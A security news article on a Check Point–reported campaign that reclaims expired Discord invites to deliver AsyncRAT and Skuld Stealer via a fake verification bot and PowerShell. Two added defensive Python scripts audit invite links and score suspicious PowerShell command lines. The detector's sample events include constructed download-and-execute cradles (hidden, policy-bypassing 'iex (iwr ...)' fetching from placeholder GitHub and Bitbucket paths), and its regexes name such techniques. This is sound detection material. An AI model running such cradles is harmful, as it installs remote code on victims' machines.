Malware Campaign Hijacks Old Discord Links To Hack Crypto Users

Image by ELLA DON, from Unsplash


Hackers are hijacking expired Discord invite links to trick users into malware infections that steal crypto wallets and bypass browser security tools.

In a rush? Here are the quick facts:

  • Victims redirected to phishing sites through fake Discord verification bots.
  • Malware downloaded from trusted platforms like GitHub and Pastebin.
  • AsyncRAT and Skuld Stealer target crypto wallets and sensitive user data.

According to Check Point's research team, cybercriminals are using expired Discord invite links to lead users to malicious servers, resulting in advanced malware infections.

Attackers hijack former invite links that once belonged to trusted communities and use them to send users to imitation Discord servers. The fake servers trick users into downloading malware, including AsyncRAT and Skuld Stealer, a stealer that targets cryptocurrency wallets.

The attackers exploit how Discord generates invite links, which can be either temporary or permanent. Once a link has expired or been abandoned, attackers reclaim it and point it at a malicious Discord server under their control.

As a result, users who click what appear to be valid invitations on social media or in outdated posts are taken straight to servers controlled by the attackers.
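The hijack works because an old link keeps resolving, just to a different server. A community can catch that by auditing the invite links in its own old posts and comparing the server each link resolves to today against the server it is supposed to point at. The script below is an added example written for this article, not Check Point's tooling or anything from the campaign: the invite URL pattern is my own, the posts and guild IDs are constructed placeholders, and the resolver is a stand-in for the real lookup (in production it would call Discord's invite lookup API, which is an assumption of this example, and treat a 404 as "expired").

```python
import re
from typing import Callable, Optional

# Matches the common Discord invite URL forms; the invite code is the last path
# segment. This pattern is the example's own assumption, not from the research.
INVITE_RE = re.compile(
    r"https?://(?:www\.)?(?:discord\.gg|discord(?:app)?\.com/invite)/([A-Za-z0-9-]+)",
    re.IGNORECASE,
)

# Constructed sample: old community posts containing invite links, plus the
# guild (server) ID the community's real server is known to have.
# All guild IDs here are hypothetical placeholders.
SAMPLE_POSTS = [
    {"source": "forum-faq-2022",
     "text": "Join our support server: https://discord.gg/examplecoin",
     "expected_guild": "100000000000000001"},
    {"source": "tweet-2021",
     "text": "Come chat with us at https://discord.com/invite/aB3dE9xY",
     "expected_guild": "100000000000000001"},
    {"source": "blog-2020",
     "text": "Promo channel: https://discord.gg/oldpromo (expires soon)",
     "expected_guild": "100000000000000001"},
    {"source": "readme",
     "text": "No invite links in this file."},
]

# Stand-in for resolving an invite code to the guild ID it currently points to.
# A real resolver would query Discord's invite lookup endpoint (assumed here)
# and map a 404 to None.
FAKE_INVITE_TABLE = {
    "examplecoin": "100000000000000001",  # still the legitimate community
    "aB3dE9xY": "200000000000000009",     # reclaimed: now points at another server
    # "oldpromo" is absent: expired / unknown, i.e. free to be reclaimed
}


def fake_resolve(code: str) -> Optional[str]:
    return FAKE_INVITE_TABLE.get(code)


def classify(expected: Optional[str], actual: Optional[str]) -> str:
    if actual is None:
        return "EXPIRED"    # dead link; remove it before someone else claims it
    if expected is not None and actual != expected:
        return "HIJACKED"   # still resolves, but not to the community's own server
    return "OK"


def audit_posts(posts, resolve: Callable[[str], Optional[str]]):
    """Extract every invite link from the posts and classify where it leads now."""
    findings = []
    for post in posts:
        for code in INVITE_RE.findall(post["text"]):
            actual = resolve(code)
            findings.append({
                "source": post["source"],
                "code": code,
                "resolved_guild": actual,
                "status": classify(post.get("expected_guild"), actual),
            })
    return findings


if __name__ == "__main__":
    for f in audit_posts(SAMPLE_POSTS, fake_resolve):
        print(f"{f['status']:9} {f['code']:12} {f['source']}")
```

Both the EXPIRED and the HIJACKED results deserve action: a hijacked link should be removed or replaced wherever it was published, and an expired one should be removed too, since an invite that no longer resolves is exactly the kind of link the attackers reclaim.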

Inside these fake servers, users encounter a bot called “Safeguard” that presents a fake verification process. Once users start the verification, they are taken to a phishing website, which runs a dangerous PowerShell command.

The command retrieves the malware from GitHub, Bitbucket and Pastebin, so that the downloads blend in with ordinary web traffic.

The infection runs in multiple stages to evade detection. First, a PowerShell script is downloaded from a GitHub link. This loader then retrieves the encrypted malware from Bitbucket and decrypts it before installing it on the user’s computer.

The final payloads—AsyncRAT and Skuld Stealer—let attackers remotely control the system and steal sensitive information, including user credentials and crypto wallet details from the Exodus and Atomic wallet applications. The malware also uses timed delays of up to 15 minutes to evade automated security systems.

The attackers also found a way around the protection that Google Chrome’s App-Bound Encryption provides for cookies: they modified ChromeKatz to extract login cookies directly from the memory of the Chrome, Edge, and Brave browsers.

The attacks have hit users in the United States, Vietnam, France, Germany, and other countries. The attackers appear to be focused on cryptocurrency users, since the malware specifically goes after wallet credentials and recovery phrases.

Although Discord has disabled the specific bot used in this campaign, the researchers expect the criminals to develop new methods. Users can protect themselves by avoiding outdated Discord invites, treating verification requests with caution, and keeping antivirus software up to date.
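The chain described above (a PowerShell command pulling a loader from GitHub, a second stage from Bitbucket, and long sleeps to wait out sandboxes) leaves a recognisable trail in process-creation telemetry. The script below is an added example for this article, not Check Point's detection logic and not the campaign's actual commands: it scores PowerShell command lines with heuristics of my own (download cradle, in-memory execution, hidden-window or bypass flags, a long Start-Sleep, and a fetch from one of the hosting sites named in the report) and runs them over a handful of constructed events. The command lines, paths and pids are invented to mirror the described stages and are not indicators from the campaign.

```python
import re
from dataclasses import dataclass, field

# Download locations the report names for the campaign's stages.
STAGING_HOSTS = ("raw.githubusercontent.com", "github.com", "bitbucket.org", "pastebin.com")

# Heuristic patterns; these are this example's own, not the campaign's commands.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient|"
    r"downloadstring|downloaddata|downloadfile|\bcurl\b|\bwget\b)")
IN_MEMORY_EXEC = re.compile(r"(?i)(\biex\b|invoke-expression)")
EVASION_FLAGS = re.compile(
    r"(?i)(-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?(?:\s|$)|"
    r"-ep\s+bypass|executionpolicy\s+bypass)")
# Only -Seconds (or a bare number) is parsed; -Milliseconds is ignored here.
LONG_SLEEP = re.compile(r"(?i)start-sleep\s+(?:-s(?:econds)?\s+)?(\d+)")
LONG_SLEEP_THRESHOLD = 300  # seconds; the report cites delays of up to 15 minutes

# Constructed process-creation events (hypothetical, not campaign IoCs).
SAMPLE_EVENTS = [
    {"pid": 4312, "parent": "explorer.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (iwr "
                "'https://raw.githubusercontent.com/EXAMPLE/stage1.ps1' -UseBasicParsing)\""},
    {"pid": 4320, "parent": "powershell.exe",
     "cmdline": "powershell.exe -c \"Start-Sleep -Seconds 900; $b=(New-Object Net.WebClient)"
                ".DownloadData('https://bitbucket.org/EXAMPLE/raw/payload.bin')\""},
    {"pid": 5001, "parent": "explorer.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"pid": 5100, "parent": "cmd.exe",
     "cmdline": "powershell.exe -c \"git clone https://github.com/EXAMPLE/internal-tool\""},
]


@dataclass
class Finding:
    pid: int
    score: int = 0
    reasons: list = field(default_factory=list)


def score_event(ev: dict) -> Finding:
    """Weight the independent signals so that one alone (e.g. a GitHub URL) does not alert."""
    cmd = ev["cmdline"]
    f = Finding(pid=ev["pid"])
    hosts = [h for h in STAGING_HOSTS if h in cmd.lower()]
    if hosts:
        f.score += 2
        f.reasons.append("fetches from code-hosting/paste site: " + ", ".join(hosts))
    if DOWNLOAD_CRADLE.search(cmd):
        f.score += 2
        f.reasons.append("download cradle")
    if IN_MEMORY_EXEC.search(cmd):
        f.score += 2
        f.reasons.append("executes downloaded content in memory")
    if EVASION_FLAGS.search(cmd):
        f.score += 1
        f.reasons.append("hidden window / execution-policy bypass / encoded command")
    m = LONG_SLEEP.search(cmd)
    if m and int(m.group(1)) >= LONG_SLEEP_THRESHOLD:
        f.score += 1
        f.reasons.append(f"long Start-Sleep ({m.group(1)} s)")
    return f


def scan(events, threshold: int = 4):
    """Return the findings whose combined score reaches the alert threshold."""
    return [f for f in map(score_event, events) if f.score >= threshold]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid {f.pid} score {f.score}: " + "; ".join(f.reasons))
```

The threshold is what keeps the benign events quiet: a developer cloning from GitHub scores on the host alone, and a scheduled script scores nothing, while the two constructed stages each combine a staging host with a download cradle and either in-memory execution or a 900-second sleep.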
